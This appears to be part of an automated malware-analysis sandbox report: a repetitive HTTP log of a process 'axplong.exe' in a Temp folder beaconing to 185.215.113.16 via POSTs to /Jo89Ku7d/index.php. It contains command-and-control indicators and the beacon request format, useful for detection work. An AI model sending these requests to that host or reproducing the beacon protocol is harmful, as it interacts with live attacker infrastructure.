                    Sep 27, 2024 01:29:54.190242052 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    46 | 192.168.2.7 | 49753 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:54.306905031 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:55.015114069 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:55.016233921 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:55.245140076 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    47 | 192.168.2.7 | 49754 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:55.352986097 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:56.059129000 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:56.061546087 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:56.292239904 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    48 | 192.168.2.7 | 49755 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:56.404169083 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:57.107424021 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:57.108181000 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:57.331981897 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    49 | 192.168.2.7 | 49756 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:57.448008060 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:58.156274080 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:58.157058001 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:58.416165113 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    50 | 192.168.2.7 | 49757 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:58.525059938 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:59.251431942 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:59.252312899 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:59.484220028 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    51 | 192.168.2.7 | 49758 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:59.603645086 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:00.328620911 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:30:00.331284046 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:00.555938959 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    52 | 192.168.2.7 | 49759 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:30:00.664974928 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:01.371134043 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:30:01.371953964 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:01.614501953 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    53 | 192.168.2.7 | 49760 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:30:01.728640079 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:02.446580887 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:30:02.452934980 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:02.682892084 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    54 | 192.168.2.7 | 49761 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:30:02.793092966 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:03.504374981 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    55 | 192.168.2.7 | 49762 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:30:03.515361071 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:04.228378057 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    56 | 192.168.2.7 | 49763 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:30:04.339654922 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:05.059338093 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    57 | 192.168.2.7 | 49764 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:30:05.133985996 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:05.786137104 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    58 | 192.168.2.7 | 49765 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:30:05.902647972 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:06.623245001 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    59 | 192.168.2.7 | 49766 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:30:06.631886005 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:07.335659027 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    60 | 192.168.2.7 | 49767 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:30:07.594947100 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:08.331073046 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    61 | 192.168.2.7 | 49768 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:30:08.339634895 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:09.146142006 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    62 | 192.168.2.7 | 49769 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:30:09.261218071 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:10.735990047 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:30:10.736929893 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:30:10.738190889 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    63 | 192.168.2.7 | 49770 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:30:10.746455908 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:11.497175932 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    64 | 192.168.2.7 | 49771 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:30:11.622029066 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:12.326397896 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    65 | 192.168.2.7 | 49772 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:30:12.335261106 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:13.056163073 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
